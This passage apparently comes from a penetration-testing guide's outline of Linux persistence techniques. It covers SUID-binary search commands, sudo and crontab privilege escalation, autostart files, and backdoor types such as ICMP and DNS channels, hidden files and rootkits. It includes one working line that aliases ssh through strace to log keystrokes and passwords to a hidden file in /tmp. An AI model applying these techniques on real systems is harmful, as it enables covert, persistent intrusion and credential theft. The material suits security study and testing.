6.2.2. Persistence

6.2.2.1. Privilege Escalation

• Kernel exploit

• Attack services with root privileges

• Use third-party services to escalate rights

• Via an executable with the SUID attribute

  • Find executable files that may escalate privileges

  • find / -perm +4000 -ls

  • find / -perm -u=s -type f 2>/dev/null

  • find / -user root -perm -4000 -print 2>/dev/null

  • find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

• Take advantage of available root privileges

  • sudo -l

• Exploiting misconfigured crontab tasks

6.2.2.2. Self-start

• /etc/init.d

• /etc/rc.d/rc.local

• ~/.bashrc

• ~/.zshrc

6.2.2.3. Backdoors

• ssh backdoors

  • alias ssh='strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh'

  • Backdoor account

• Common applications

  • ICMP

  • DNS

• icmp backdoor

• Backdoor port multiplexing

• . hide files at the beginning

• rootkit